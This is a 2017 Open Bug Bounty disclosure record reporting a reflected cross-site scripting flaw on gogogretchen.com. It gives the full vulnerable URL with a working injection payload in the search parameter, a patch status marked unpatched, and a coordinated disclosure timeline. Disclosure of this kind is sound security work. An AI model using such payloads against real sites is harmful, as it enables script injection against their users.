Lucene search
Random_RobbieOBB:206612HistoryJan 16, 2017 - 11:10 a.m.
gogogretchen.com XSS vulnerability
2017-01-1611:10:00
Random_Robbie
www.openbugbounty.org
11
Vulnerable URL:
http://www.gogogretchen.com/?nsearch=Archtop-w%27"--!>confirm`OPENBUGBOUNTY`%3C/script /K/>&price-under;=745'
Details:
| Description | Value |
|---|---|
| Patched: | No |
| Latest check for patch: | 30.07.2017 |
| Vulnerability type: | XSS |
| Vulnerability status: | Publicly disclosed |
| Alexa Rank | 4502496 |
| VIP website status: | No |
| Check gogogretchen.com SSL connection: | (Grade: A-) |
Coordinated Disclosure Timeline:
| Description | Value |
|---|---|
| Vulnerability submitted via Open Bug Bounty | 16 January, 2017 11:10 GMT |
| Vulnerability existence verified and confirmed | 17 January, 2017 06:35 GMT |
| Notification sent to subscribers (without technical details) | 17 January, 2017 10:17 GMT |
| Vulnerability details disclosed by researcher | 14 February, 2017 07:14 GMT |